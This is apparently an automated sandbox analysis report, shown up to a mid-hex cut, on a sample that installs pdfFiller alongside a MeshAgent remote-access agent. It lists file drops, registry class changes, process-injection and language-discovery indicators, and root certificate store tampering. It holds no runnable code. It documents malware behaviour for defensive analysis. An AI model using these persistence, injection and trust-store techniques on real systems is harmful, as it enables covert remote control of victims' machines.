File opened for modification C:\Windows\SysWOW64\dll\wgdi32full.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\symbols\DLL\wkernel32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\advapi32.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\wntdll.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dbgcore.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Windows\SysWOW64\dll\wwin32u.pdb C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4408 set thread context of 460 N/A C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\pdfFiller\System.Runtime.CompilerServices.Unsafe.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Text.Encodings.Web.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Text.Json.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-PIPL7.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-4Q8KH.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-DHKA7.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-P6BNA.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-K4DUM.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\MaterialDesignColors.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\pdfFiller.exe C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-8QM25.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-IHDLM.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-GMART.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.WinForms.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Buffers.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\WebView2Loader.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-04S7L.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Griffin.Core.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Newtonsoft.Json.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-L1BUO.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-JNBRG.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-KM3E6.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-UH6G0.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-H4Q2J.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Threading.Tasks.Extensions.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Castle.Core.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Bcl.AsyncInterfaces.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.Core.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-0IA04.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Reactive.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\SimpleInjector.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-A28P1.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-PF901.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-HI499.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\microsoft.management.infrastructure.native.unmanaged.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-RHM6Q.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File created C:\Program Files (x86)\pdfFiller\is-EE5NT.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\pdfFiller\AutoUpdater.NET.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Microsoft.Web.WebView2.Wpf.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-BOTLD.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-5SGGM.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-QG5OD.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.log C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
File created C:\Program Files (x86)\pdfFiller\is-DD299.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-49S4A.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-GNE12.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\Refit.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Memory.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\pdfFiller\System.Numerics.Vectors.dll C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-S7I31.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File created C:\Program Files (x86)\pdfFiller\is-2AGIG.tmp C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\meshagent32-mesh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\68b6811b97ee6130c2cc4fcf36991e6a N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Installer\jre\bin\javaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\chcp.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\WMIC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Install(4).exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\pdfFiller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\more.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\wbem\wmic.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133733455051339586" C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Mesh Agent\MeshAgent.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pdf\OpenWithProgids\pdfFillerFile.pdf C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.doc\OpenWithProgids\pdfFillerFile.doc C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ppt\OpenWithProgids\pdfFillerFile.ppt C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.docx\OpenWithProgids\pdfFillerFile.docx C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.pptx\OpenWithProgids\pdfFillerFile.pptx C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txt\OpenWithProgids\pdfFillerFile.txt C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.jpeg\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\ = "URL:pdfFiller Protocol" C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.doc\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.docx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\Url Protocol C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.txt\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.png\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open\command\ = "\"C:\\Program Files (x86)\\pdfFiller\\pdfFiller.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.ppt\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.jpeg\OpenWithProgids\pdfFillerFile.jpeg C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\DefaultIcon\ = "C:\\Program Files (x86)\\pdfFiller\\pdfFiller.exe,0" C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open\command C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.png\OpenWithProgids\pdfFillerFile.png C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pdf\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pptx\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.jpg\OpenWithProgids\pdfFillerFile.jpg C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\pdffiller\shell\open C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\.jpg\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A
Key created \REGISTRY\MACHINE\Software\Classes\pdffiller\DefaultIcon C:\Users\Admin\AppData\Local\Temp\is-H5PDD.tmp\pdfFiller.tmp N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 C:\Program Files (x86)\pdfFiller\pdfFiller.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 0f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd94090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b0601050507030762000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3390b000000010000001800000045006e00740072007500730074002e006e006500740000001400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab1d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d347e000000010000000800000000c001b39667d6010300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d42000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f7420436572746966696